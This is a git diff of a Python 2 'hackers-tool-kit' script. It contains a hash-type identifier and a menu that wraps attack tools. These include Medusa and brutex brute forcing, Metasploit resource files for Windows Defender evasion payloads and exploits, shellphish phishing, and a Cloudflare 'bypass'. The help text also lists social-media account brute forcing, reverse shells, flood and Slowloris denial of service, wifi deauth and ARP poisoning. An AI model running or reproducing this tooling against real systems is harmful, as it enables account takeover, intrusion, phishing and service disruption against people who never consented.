hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109280") - def sha1saltmd5pass(): - hs='860465ede0625deebb4fbbedcb0db9dc65faec30' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109300") - def sha1saltmd5passsalt(): - hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109320") - def sha1saltsha1pass(): - hs='58714327f9407097c64032a2fd5bff3a260cb85f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109340") - def sha1saltsha1saltsha1pass(): - hs='cc600a2903130c945aa178396910135cc7f93c63' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109360") - def sha1usernamepass(): - hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109380") - def sha1usernamepasssalt(): - hs='00025111b3c4d0ac1635558ce2393f77e94770c5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109400") - def sha1md5pass(): - hs='fa960056c0dea57de94776d3759fb555a15cae87' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("1094202") - def sha1md5passsalt(): - hs='1dad2b71432d83312e61d25aeb627593295bcc9a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109440") - def sha1md5sha1pass(): - hs='8bceaeed74c17571c15cdb9494e992db3c263695' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109460") - def sha1sha1pass(): - hs='3109b810188fcde0900f9907d2ebcaa10277d10e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109480") - def sha1sha1passsalt(): - hs='780d43fa11693b61875321b6b54905ee488d7760' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109500") - def sha1sha1passsubstrpass03(): - hs='5ed6bc680b59c580db4a38df307bd4621759324e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109520") - def sha1sha1saltpass(): - hs='70506bac605485b4143ca114cbd4a3580d76a413' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109540") - def sha1sha1sha1pass(): - hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109560") - def sha1strtolowerusernamepass(): - hs='79f575543061e158c2da3799f999eb7c95261f07' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109580") - - def Haval192(): - hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110040") - def Haval192HMAC(): - hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110080") - def Tiger192(): - hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110020") - def Tiger192HMAC(): - hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110060") - - def MD5passsaltjoomla1(): - hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("112020") - - def SHA1Django(): - hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: - jerar.append("113020") - - def Haval224(): - hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114040") - def Haval224HMAC(): - hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114080") - def SHA224(): - hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114020") - def SHA224HMAC(): - hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114060") - - def SHA256(): - hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115020") - def SHA256HMAC(): - hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115120") - def Haval256(): - hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115040") - def Haval256HMAC(): - hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115140") - def GOSTR341194(): - hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115060") - def RipeMD256(): - hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115080") - def RipeMD256HMAC(): - hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115160") - def SNEFRU256(): - hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115100") - def SNEFRU256HMAC(): - hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115180") - def SHA256md5pass(): - hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115200") - def SHA256sha1pass(): - hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115220") - - def MD5passsaltjoomla2(): - hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("116020") - def SAM(): - hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: - jerar.append("116040") - - def SHA256Django(): - hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: - jerar.append("117020") - - def RipeMD320(): - hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118020") - def RipeMD320HMAC(): - hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118040") - - def SHA384(): - hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119020") - def SHA384HMAC(): - hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119040") - - def SHA256s(): - hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: - jerar.append("120020") - - def SHA384Django(): - hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: - print " [+] SHA-384(Django)" - jerar.append("121020") - - def SHA512(): - hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122020") - def SHA512HMAC(): - hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122060") - def Whirlpool(): - hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122040") - def WhirlpoolHMAC(): - hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122080") - - - print logo - while True: - jerar=[] - print """ - -------------------------------------------------------------------------""" - hash = raw_input(" HASH: ") - ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() - - if len(jerar)==0: - print "" - print " Not Found." - elif len(jerar)>2: - jerar.sort() - print "" - print "Possible Hashs:" - print "[+] ",algorithms[jerar[0]] - print "[+] ",algorithms[jerar[1]] - print "" - print "Least Possible Hashs:" - for a in range(int(len(jerar))-2): - print "[+] ",algorithms[jerar[a+2]] - else: - jerar.sort() - print "" - print "Possible Hashs:" - for a in range(len(jerar)): - print "[+] ",algorithms[jerar[a]] -def restart(): - os.system("clear") - os.system("cd /root/hackers-tool-kit && python htk.py") -def medusa(): - k = raw_input("Target Host: ") - u = raw_input("User: ") - p = raw_input("Wordlist: ") - os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") - print "\n" - m = raw_input("Module: ") - n = raw_input("Port: ") - a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) - os.system(a) -def wafwoof(): - j = raw_input("Enter Target: ") - k = 'wafw00f {0}'.format(j) - os.system(k) -def cloud(): - - subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] - - print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") - - host = raw_input("Enter Target: ") - for sublist in subdomainlist: - try: - hosts = str(sublist) + "." + str(host) - showip = socket.gethostbyname(str(hosts)) - print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) - except: - pass - - print ( '\033[93m' + "Credit Goes To: tugrulbey.com") - print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") -def brutex(): - k = raw_input("Target: ") - p = raw_input("Port: ") - a = 'brutex {0} {1}'.format(k,p) - os.system(a) -def methelp(): - os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") -def winbyp(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - pay = raw_input("Payload: ") - port = raw_input("Port: ") - name = raw_input("File Name: ") - os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') - os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) - os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') - os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) - os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) - os.system('echo "run\n" >> winbyp.rc') - os.system("service postgresql restart") - os.system('msfconsole -r winbyp.rc') - os.system('rm -rf winbyp.rc') -def exploit(): - os.system("cat /root/hackers-tool-kit/tools/exploits.txt") - print "\n" - f = raw_input("Select Exploit: ") - os.system('echo "use {0}\n" >> exploit.rc'.format(f)) - os.system('echo "show options\n" >> exploit.rc'.format(f)) - os.system("service postgresql restart") - os.system('msfconsole -r exploit.rc') - os.system('rm -rf exploit.rc') -def phish(): - os.system("bash /root/shellphish/shellphish.sh") -def datalist(): - os.system('echo "hosts\n" >> data.rc') - os.system('echo "services\n" >> data.rc') - os.system("service postgresql restart") - os.system('msfconsole -r data.rc') - os.system('rm -rf data.rc') -def msfev(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show evasion'""") -def upgrade(): - os.system("apt update && apt upgrade") -def nscript(): - os.system("cat /root/hackers-tool-kit/tools/scripts.txt") - print "\n" - j = raw_input(G+"Select Script:\033[0m ") - k = raw_input(G+"Target:\033[0m ") - a = 'nmap --script {0} {1}'.format(j,k) - os.system(a) -def sshver(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - b = raw_input(G+"Timeout: \033[0m") - os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') - os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) - os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) - os.system('echo "show options\n" >> sshver.rc') - os.system('echo "run\n" >> sshver.rc') - os.system("service postgresql restart") - os.system('msfconsole -r sshver.rc') - os.system('rm -rf sshver.rc') -def chains(): - h = raw_input("Enter Browser: ") - j = raw_input("Enter Website: ") - a = 'proxychains {0} {1}'.format(h,j) - os.system(a) -def mysqlv(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') - os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) - os.system('echo "show options\n" >> mysqlv.rc') - os.system('echo "run\n" >> mysqlv.rc') - os.system("service postgresql restart") - os.system('msfconsole -r mysqlv.rc') - os.system('rm -rf mysqlv.rc') -def main(): - found = False - while not found: - x = raw_input(N+'\033[91m[\033[0mhtk\033[91m]\033[94m->\033[92m: \033[0m') - if x == "?": - help() - if x == "winload" : - winload() - if x == "clear" : - os.system("clear") - mainbanner() - if x == "andload": - andload() - if x == "command": - c = raw_input("Command: ") - os.system(c) - if x == "msfcon" : - os.system("service postgresql start") - os.system("msfconsole") - if x == "set": - os.system("setoolkit") - if x == "msfven": - print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" - v = raw_input(G+"MSFVENOM: \033[0m") - os.system("msfvenom", v) - if x == "gmail" : - gmail() - if x == "insta": - insta() - if x == "fb" : - fb() - if x == "ipgrab": - ipgrab() - if x == "myip": - myip() - if x == "wifite": - wifite() - if x == "mon" : - mon() - if x == "netdev" : - netdev() - if x == "scannet": - scannet() - if x == "exit" : - import sys - print "follow \033[92m@unkn0wn_bali\033[0m on instagram" - sys.exit() - if x == "rebootl": - print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" - c = raw_input("[y/n]> ") - if c == "y" : - os.system("reboot") - if c == "n" : - os.system("clear") - mainbanner() - main() - if x == "port": - port() - if x == "info": - info() - if x == "sysinfo": - sysinfo() - if x == "msfex": - msfex() - if x == "udp": - udp() - if x == "tcp": - tcp() - if x == "syn": - syn() - if x == "msfpa": - msfpa() - if x == "msfau": - msfau() - if x == "ping" : - ping() - if x == "multih": - multih() - if x == "msfall": - msfall() - if x == "hydra" : - hydra() - if x == "cupp": - cupp() - if x == "vdir": - vdir() - if x == "monoff": - monoff() - if x == "vpn": - vpn() - if x == "vpnoff": - vpnoff() - if x == "slowl": - slowl() - if x == "pidox": - pidox() - if x == "specnet": - specnet() - if x == "pingen": - pingen() - if x == "reaver": - reaver() - if x == "deauth": - deauth() - if x == "macc": - macc() - if x == "macoff": - macoff() - if x == "arppois": - appois() - if x == "sslscan": - sslscan() - if x == "payload": - payload() - if x == "crunch": - crunch() - if x == "traff": - traff() - if x == "resa": - resa() - if x == "resu": - resu() - if x == "hashid": - hashid() - if x == "restart": - restart() - if x == "medusa": - medusa() - if x == "wafwoof": - wafwoof() - if x == "cloud": - cloud() - if x == "brutex": - brutex() - if x == "methelp": - methelp() - if x == "winbyp": - winbyp() - if x == "exploit": - exploit() - if x == "phish": - phish() - if x == "datalist": - datalist() - if x == "msfev": - msfev() - if x == "upgrade": - upgrade() - if x == "nscript": - nscript() - if x == "sshver": - sshver() - if x == "chains": - chains() - if x == "mysqlv": - mysqlv() - found = True -mainbanner() -main() From a4d4b96d9d1189645154c43cd6c5634b6dc83da6 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sun, 24 Mar 2019 14:22:31 -0400 Subject: [PATCH 052/214] Add files via upload --- htk.py | 2038 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 2038 insertions(+) create mode 100644 htk.py diff --git a/htk.py b/htk.py new file mode 100644 index 0000000..7a16fcc --- /dev/null +++ b/htk.py @@ -0,0 +1,2038 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @unkn0wn_bali +#i do not give you permission to edit this script without my credit +import os +print "Starting hackers-tool-kit... [ * ]-[0%]" +import platform +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[5%]" +import webbrowser +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[9%]" +import hashlib +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[14%]" +import subprocess +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[19%]" +import zipfile +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[23%]" +import colorama +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[25%]" +from modules import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[26%]" +import modules.colors +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[27%]" +import builtwith +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[29%]" +from urllib2 import urlopen +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[31%]" +from urllib2 import URLError +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[34%]" +from urllib2 import HTTPError +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[38%]" +from urllib import urlencode +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[39%]" +from plugins.DNSDumpsterAPI import DNSDumpsterAPI +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[41%]" +import whois +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[45%]" +import json +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[47%]" +from urlparse import urlparse +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[50%]" +from re import search, sub +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[55%]" +import cookielib +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[56%]" +import socket +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[59%]" +from scapy.all import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[60%]" +from threading import Thread, active_count +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[63%]" +import random +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[67%]" +import string +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[70%]" +import signal +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[73%]" +import ssl +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[79%]" +import argparse +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[83%]" +import sys +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[86%]" +import socks +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[89%]" +import mechanize +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[90%]" +import requests +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[94%]" +import time +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[96%]" +from datetime import datetime +now = datetime.now() +hour = now.hour +minute = now.minute +day = now.day +month = now.month +year = now.year +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[99%]" +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +Gb = random._urandom(20000) +bytes = random._urandom(20000) +Kb = random._urandom(20000) +r = '\033[31m' +W = '\033[90m' +R = '\033[91m' +N = '\033[0m' +G = '\033[92m' +B = '\033[94m' +Y = '\033[93m' +LB = '\033[1;36m' +P = '\033[95m' +Bl = '\033[30m' +O = '\033[33m' +p = '\033[35m' +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" +os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") +os.system("service tor start") +os.system("service postgresql start") +os.system("clear") +def mainbanner(): + os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") + print N+"""\033[34m + .............. \033[0mtype ? for help\033[34m + ..,;:ccc,. + ......''';lxO. + .....''''..........,:ld; + .';;;:::;,,.x, + ..'''. 0Xxoc:,. ... + .... ,ONkc;,;cokOdc',. + . OMo ':ddo. + dMc :OO; + 0M. .:o. + ;Wd + ;XO, \033[93mCreated By @unkn0wn_bali On Instagram\033[34m + ,d0Odlc;,.. + ..',;:cdOOd::,. + .:d;.':;. + 'd, .' + ;l .. + .o + c + .' + .\033[92m + ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ + ██ ██ ▀▀▀██▀▀▀ ██ ██▀ + ██ ██ ██ ██▄██ + ████████ ██ █████ + ██ ██ █████ ██ █████ ██ ██▄ + ██ ██ ██ ██ ██▄ + ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m + ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ + ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ + ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + """.decode('utf-8') +def help(): + print B+""" +▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ + ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ + ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ +\033[0m ░ +? : displays this message +clear : clears screen except for banner +exit : exits script +restart : re run hackers-tool-kit +rebootl : reboot whole device +winload : windows reverse_tcp payload +andload : android reverse_tcp payload +connect : connect to a host +command : execute terminal command +msfcon : metasploit console +set : setoolkit console +msfven : msfvenom +gmail : gmail bruteforce +insta : instagram bruteforce +fb : facebook bruteforce +hydra : Black-Hydra bruteforce +medusa : Medusa bruteforce +ipgrab : host to ip address +myip : show your ip +wifite : automated wifi hacker +reaver : reaver automated [ wifi hack ] +mon : put device in monitor mode +monoff : put device out of monitor mode +netdev : find all devices in your network +scannet : scan for networks around you +specnet : scan a specific network +port : scan for ports on a host +info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m +sysinfo : info about your system \033[91m ██ ██\033[0m +msfex : shows all metasploit exploits \033[91m ██ ██\033[0m +msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfall : shows all metasploit modules \033[91m ██ ██\033[0m +udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m +tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m +syn : SYN flood / dos \033[91m █ █\033[0m +slowl : Slow Loris dos \033[91m █ █ \033[0m +ping : pings host \033[91m █ █\033[0m +multih : start a multi handler \033[91m █ █\033[0m +cupp : make wordlists \/ vvvvvvvvv \/ +vdir : view files of a directory +vpn : activate a vpn TIP: "ctrl c" usually stops a script if you dont want to keep running it +vpnoff : stop vpn +pidox : dox website +pingen : Generate a routers default pin +deauth : deauth attack / wifi jammer +macc : changes mac address +macoff : returns mac address to normal +arppois : ARP poisoning +sslscan : ssl scan a host +payload : make a metasploit payload of your choice +crunch : Make wordlists +traff : shows your internet traffic +resa : reset account password +resu : reset unix password +hashid : find the type of hash of a hash +wafwoof : 